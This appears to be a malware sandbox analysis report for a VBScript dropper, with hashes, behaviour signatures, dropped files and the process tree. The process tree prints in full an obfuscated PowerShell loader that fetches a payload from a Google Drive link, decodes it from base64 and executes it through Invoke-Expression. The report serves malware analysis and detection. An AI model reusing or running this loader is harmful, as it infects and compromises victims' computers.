Analysis

  • max time kernel
    94s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/06/2024, 07:18

General

  • Target

    83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs

  • Size

    23KB

  • MD5

    70e2991e57991e054e3473a4a9ec2a63

  • SHA1

    1fe4276566a2c6e7db0ab8b85cdc7b4de9cf86c1

  • SHA256

    83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d

  • SHA512

    4f32f979ca9da2bcca42d727f08215f8b652b17d0e98d9e31fe6f5414789731bf9805d8f74990af917ea8c2b0b4f0fa9124101759df17d4c601d90670f76300d

  • SSDEEP

    384:AcYk2uAnvIa7Yp000ekqThmLjp45PyUi6KkNXmNYXkfRf:Acx2p57qQqejpAPyUi6BNXxUft

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\83d3658eae751eca0688750d43d8c07889b437eca461ba5a41b552048d3ad75d.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2528
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lgknoldet = 1;Function Berringsfladen190($Scratchcard){$Coil=$Scratchcard.Length-$Lgknoldet;$Kodfoderets='Substring';For( $gadebilledet=7;$gadebilledet -lt $Coil;$gadebilledet+=8){$Underargue+=$Scratchcard.$Kodfoderets.Invoke( $gadebilledet, $Lgknoldet);}$Underargue;}function Forlyder($Climata11){ & ($Spatten) ($Climata11);}$benzimidazole=Berringsfladen190 'At,osfrMOsteopeoWheelabzIconveriAnnicaslSquiffilUndisciaSyninge/ Militr5Autobah.R.educa0Nonrege Untast.(ArbejdsWKonsti i UnderlnapiolindThermogoSvensknwPhototusKelpi,g TwofersNNudni.kTEntreat aianis1 Ari.rs0Aminotr. Heglin0Ostraci;Reguler FenolerWBestredi OpremsnBredspe6Kandi,a4Ba depl;Salater TilflyxDirecto6Profite4Hyperfo; Curumi Cam,hacrbrndborvPluri.o:Smit et1Uvaerd 2Undergr1Omlbets.Snitvrk0Phenoge)rgsjler KonsumpG bi.dsee EthanocIlluderk Embo,co Re.ren/Sarcorh2B,edsaa0 Lemmed1Osmousa0Karskca0Teknolo1.nitsel0Fagvide1Enbran, DelthedFtro,ekliM,crospr.iggyslechalanafLeukemio UdpegexM ckere/Klockma1Justtre2l,njefa1Renerne.Unmecha0Sa mens ';$Tirve=Berringsfladen190 'ImpoverUTandlgesMyelineeslickinrReempha- AngepiA BerusegOpinioneEksisten infinitEskimol ';$hawklike=Berringsfladen190 'PaneulohPrinzhot lar.ertDaavildp Si.onisSam.and:Pict.an/Lystopf/outw.rkdFastholrBrut.oiiGestikuvPhocenie Deir r.Huchof,gdissei,oUnbarspo.icondygHalvkuglKlvedese Firepl.Afnati.c IntranoPruditym,pasmol/T.letaduruf sitcSvmmela?Discrete ArchpaxClinoc pTr adreoPatri.trStemmeptF rulem=Asplenidneighboo,dscripw pill anGallardlatomythotautoloaProx,mod Beeroc&D,llerii ChoribdForbrnd=Ostraco1FyrmestRStaminaRSplurgigReprovip Echino_Centr,fRBrnelrdz Rvrdig2Enceph,yClothotpSuitlikiOculonaJforbrydcStreget0Kyphosi0 ,radusN Pi,udipOceanisuFuturisZ T,ille4goo nesPChaperot gyrome-MateriaiAabenbaw Stnned9WellermvMinimumjDeserteKSektion2 Nonmet7Ganglio2grundta ';$Galliwasp=Berringsfladen190 ' Cumbro>Noncura ';$Spatten=Berringsfladen190 'cylindeiAntisipespionsax Lkkers ';$Cestos='Plsebar';$Uncastle = Berringsfladen190 'Skrukh.eVarebetc BoremahResorbeoRebuoya Dobbel%GuldaldaRebunchpUnglac pInstrumd Dent,iaNonsenst Slavd,a .akers% Uncarn\rovsingkKassea r Phyl.oe DammusdT larigiUnraptutCurvulatDonkeyke F somhnInterd,.LeatherN estlndoFunnellnudstykn Tanksta&indenri&populat Sk,vrigeFixearbcUnaturehDespotioRedisti SiegeabtHyleton ';Forlyder (Berringsfladen190 'Minxshi$kazaktagperspe l Yi,esao ellw nbMentoriaMaintailweather:GetatabBGrat,iteFalsknekAl,rinslSt,diecaResign gSluknineForeloulJoniseriJant.rsg HandedeFolkedor Ringvee comedis Angleb=Lsepult(Codesigc Forligm asturtdW.ndfla Coilyea/Wal,mancMilieur unmole$AndensiUOverfornStn,etsc GratisaForv klsArteriotDiphtholSeriocoeVampyr )Imm nas ');Forlyder (Berringsfladen190 'Ekst.at$t,kstmag BalloolTahinamoVan,alibAlgeaspaSusendel Bortad:,iatomeBgaspistuFun.ametValfar.y OutgoilMilitrnaEl.ktrimLiljekoi,ignalbnForbruseDisprop=gy,ospo$VelopdrhefterkraSeksogtwDirekt.kYaqo,aslKradsemiOrd einkSeptleveAscidio.Maaltids UnriskpCoveraglHusstaniEnergimtV,dired(Vlverhu$SprngkrGclo steaArno.islMurmurelGalosheiE fektiwSyskedaa SentimsBancosrpWeelvir)Hemolym ');$hawklike=$Butylamine[0];$Icterine= (Berringsfladen190 'Lysesta$ Unp,esgMisapprlLygtem,oCliquisb ParqueaSuppegrlWooersv:F.rbldtBti,guytrStreli nPallidieSpo,tedsReturneaUndisseaLiv,lanrBortled=Lich opN Celeb,eKalve,rw E,char-Pa,asubOHoverenbHerbagej.ilburseNonpondc U urdet Regara CeilingSCalibrayBreechlsLutianitMancheseCertifimOvulist.Homoc.nNS ldiereO.cultitRa,atou.D.ppelkWHeltindeOutpoisbTruistiCPa,tsuil R,bbiniDyr.naveAk,iespnSelektit');$Icterine+=$Beklageligeres[1];Forlyder ($Icterine);Forlyder (Berringsfladen190 ' Sundhe$ Besku BKampk,ar DopplenPoncedneSjlelivs Khahooa,orestia RigborrUnf.rio.WortworH Fritage MonograDemiss.dkonsumeeHelbredr deconcsDru.maa[Rodkno.$TeleskoTSpk.uggi Unn tirArtillevCoronateCurs,re] Rea,ti=Reperso$AsketerbMiljpaaeBeboelsnbamboozzHal.geniyerkednmPsammopiIndividd commena Lemlstz.ackeysoKildeskl ynenefe Opslmm ');$Vicontiels=Berringsfladen190 ' Cult v$PaginerB Eve,tyrUr,nomenAfgangseRibningsMu icataBesgactaCognat rGenicul.PorphyrDBilandeoargumenwMac.otonEfterralTollek osmlehovaOvervind OversiFTv vlraiTeledenlLeikafoeBitterb(titulad$Data.ash NuleneaEscandawKphjestkLeukstrl Daughti Ug.kork arbuckeRegnska,Galgenf$ AfdampP Uhllost ashpeeeRiddamprAepost oseismomsBrandfapIndsk.ieLedelinr Ejend.mTrffedeo aestrouGalmandswurleyp)Unfavou ';$Pterospermous=$Beklageligeres[0];Forlyder (Berringsfladen190 ' Flyv,r$Plu,aligKompenslA elopro ThreepbGa.tritaKontoralBlommes: Heli.pOOpskrtekOneirosknotkerieFrihederGaneftrn,arkanteAttaindsSpkhugg1Velaryd9Spisefr8Skybru =Amatrni(AnretteTPlisseee MglingsWeirdybtTheoris-kemikalPDeplaneaWackymutSsonerchSrtilfl Noshers$DagtjenPTvivllstAlcaic,eElessarrhaandhvoUdsk.ftsAfstivepUnderekeOpinionrUanseelmcalycoioDelfiunu NidifisVirksom)Pal,ada ');while (!$Okkernes198) {Forlyder (Berringsfladen190 'Roseola$T.lkebigBkke,belOpslideoFa vetabH lverea Trfsikl Becree: rigsrVTakkeklvExtillveTweedjar oliedriStk.ingsFidd eb=Slutdis$PrognostimmoralrFaint su Dis,oneAnissma ') ;Forlyder $Vicontiels;Forlyder (Berringsfladen190 ' Chond.SRet eadtAmm.nitaNondemarMaa,edstSteekin-MarmoreSnetstrmlR,jsebeeTelephoeUnpeacepStr,gsr Bryllup4fire,ar ');Forlyder (Berringsfladen190 'Fo.efal$SporinggMouthp lDdedansoNoexfrdb oughesa nstabil Dephlo: FormueO.panagekEpiz,oakHeweunpe agustircapitulnNonferoeVindikas Karrie1 cciput9Aa.esky8elletre=Adulter(Afsy inTRevivale Ciconis otaltetBumleno-DemagniPPleurocaCorriget.aandudhFrstesa ,linkfy$BrneforPBecommatPlatteneHungerlrSalgssto BortsasFoliernpSindelae ContemrPreheatmZollsuboDicho,duKod ficsproblem)Mink.ar ') ;Forlyder (Berringsfladen190 'Oliefar$Konc rngAnaly.el GlyoxyoRaf.inebDisq,isaZoransbl Arguit:KulturmPOrthoceuVerden,sWigletstEdsformeCaloricrKolonneuDe.elecm FortepmVemo.sse,nlagemnCha,emoe Dimiss=Phellog$NotochogSocketll,ndespooVammelhbBrakvanaByggemylStoette:Kolokv.eEjendomxNonulcecPebbleha undervvRaakremaCrookintSre ebaeDeskr,ps Unfatt+Avenuer+Steffis% Sku.ri$Joypop.BChokolauM.tvasktPriorizyLigaturlMagnascaEarscremStratociFrimeninS.hverteTwe vem.WanglincTruttacoweaseleu.udipednSe,vanttKa.eand ') ;$hawklike=$Butylamine[$Pusterummene];}$unentrapped=293328;$Zooplasty177=30076;Forlyder (Berringsfladen190 'Espe,an$ SelskagSt.gsejlTacheomoSemiquibActuariarecrushl fisker:RelishiAKompromgSemostogCircumfrG,noesee Ensilag,yppelsaB holdntMultisoeKejserptUdkaarisEt.onom Mor,inb=Outbrag TindingGGlycopeeLvs.ovetassurer-EineborC Mol,bdoOptrkkenunl.beltPyrenoieGrskepen Gyrinit F lker Uncolor$ Gluep PFo.dumstEgalitee EmissirScaremoodesertes UnderdpbeadroleComputeropercu mFugtigkoSjllanduColyticsPa idae ');Forlyder (Berringsfladen190 'Enaptse$CurranagPonyerslSlutbetoShoddywbCapsuliaNervulolGospel.: Bur.auR Dysleke O alizlHomotraeSaltiesgGymnasieAshramsrEidologi TuparanFotocelg Sorthae E.odfirScutchen Keelmae RenummsAngrebs Roekamp= Syg.jo Ahoycri[SuperesSUdtagetyLanier,sResprintAirbruseNavle,em Spor.e.Propo,tCEnamou oKonkurrnNeo.acivGladsakeSv,dekurUskoksntproinve]Refinis:Trowser:TaenkteFSerb rarEk pedeoNonellimMiswaytBSa menbaEntredesUnintereSaunder6Aminosy4 ReeshiSCarcinotdukkevorDiptycaiZind.senHelautogStrenge(Grovvar$ MethodAkassablgJackersg EventurShockineAnimistgTrini raBehov.ntPrereveeSlagt,ft LollypsBillige) Predic ');Forlyder (Berringsfladen190 ' Pa til$Dy frosgDesorbel RechaloFortrngbL idensaslavehal,astril:MutismpPSamhrigr ReciviaAfholdei holines C relleBeedigerInd,ere Forhold=Superw pehohom[.earlssSDeci.esybsseninsDiscerpt ybstegeModstanmE.ratum.RestrikT InexoreH,lgenex Sc,phatSpouseh. sningeEBnd llanLejdesacO,erridoFamlesfdDicingoi Thiochn GigologDunamsd] Sp,nta:Stor.ed:KorrigaAFa veglSMill onCRkkeflgI ,ricotIFl essa.ChromomG .ipskgeSorglstt PseudoSBal.egntDmning.rThistediGi.bettnKonsummgrekapit(Trumfst$HudsoniRToys,meeCheesemlRetorsie TransmgKunstmaeBlegso rMetazoai DublednAdvocatgPudderne KnackerFlerdobnWiener,eNiaisgusNo,syll) Bitsto ');Forlyder (Berringsfladen190 'Searcha$Teori.ngrattrailMavercao Unmustb StorfaaSonicatl Decolo: LancerACa,pfirsIltningk Stabile ImpenetSlalomeeUnoilgrn.apperl=un rook$DansetrPFlabederstabelvaRodeoeni ,rydefsretfrd eTaranchrDrif.sp.TopkicksAdhib.tuBe,ryprbGenindssAffronttPiperylrSort.meiindissonLagringgApathi,(No.comp$ThessaluMonostenVeerufyeLaasesmnBescurft Loathsr,uldbryaOperaerpdiskenspVenialieBocher.dTatt dd,Stillin$ReappliZGevreruoslutt dodefencepuretms.l.onsellaMenufilsCataclytTote.ply.erolig1Spidsmu7Mrkelig7Bouillo)Que.ule ');Forlyder $Asketen;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4808
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kreditten.Non && echo t"
        3⤵
          PID:4776

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

            Filesize

            8KB

            MD5

            b98730add3fdac807aa8a524679c31c7

            SHA1

            0027f4bf52d43ea2aaee06a78c4dca190799e5f9

            SHA256

            8a6d3e18638460134e0ca1020b5d2ed00246327d28516b7181423e6a16ebeeed

            SHA512

            546bc8b8b3dd9d6f5a870794ad38b30ff0e052be9d00b3e5d6e35a8ca417970b86456e39d1bc6a5fb652b4d9b5765d3b47fc43033a0a151db9791df64b0b92d3

          • C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

            Filesize

            494B

            MD5

            290fae52f17dbaeec503dfb5d085abff

            SHA1

            fdae242a21f6383d0d5aab98f1bf1f3768d833b6

            SHA256

            d2390d6c0c3ba3ae1422d582888dcadcb05c387567e3000eb148da64aeb364e9

            SHA512

            7f6d352a85b7fb6c5f5d5d2d76bd081a525ff941b28f481d166a054dbbdcbe0aa4640ea6eb31b226d59f94a4cd5a549df9f041880e481ff397294a048a7a280b

          • C:\Users\Admin\AppData\Local\Temp\Flyulykker.txt

            Filesize

            3KB

            MD5

            e3c54d10d7b28f4437e5082454a22cb7

            SHA1

            f5d6c9ff3d8bebf64c7a03416e005aea2f72f82e

            SHA256

            4641feef049099ee8406644631ffb5a83d07c631c29f15490824d649c52c868b

            SHA512

            f26f744f344c692551d23f0d8281f27bd2bd6de2263b89c1642f3196ac90c28337019e5d47e9b88cf2e607b5a3e70f3c30f9ee94fb9fae43b4f3a351cd309fc6

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3j3x4tj.eds.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/4808-311-0x00007FFBFE473000-0x00007FFBFE475000-memory.dmp

            Filesize

            8KB

          • memory/4808-313-0x0000026BB38B0000-0x0000026BB38D2000-memory.dmp

            Filesize

            136KB

          • memory/4808-322-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

            Filesize

            10.8MB

          • memory/4808-323-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

            Filesize

            10.8MB

          • memory/4808-326-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

            Filesize

            10.8MB

          • memory/4808-329-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

            Filesize

            10.8MB

          • memory/4808-330-0x00007FFBFE470000-0x00007FFBFEF31000-memory.dmp

            Filesize

            10.8MB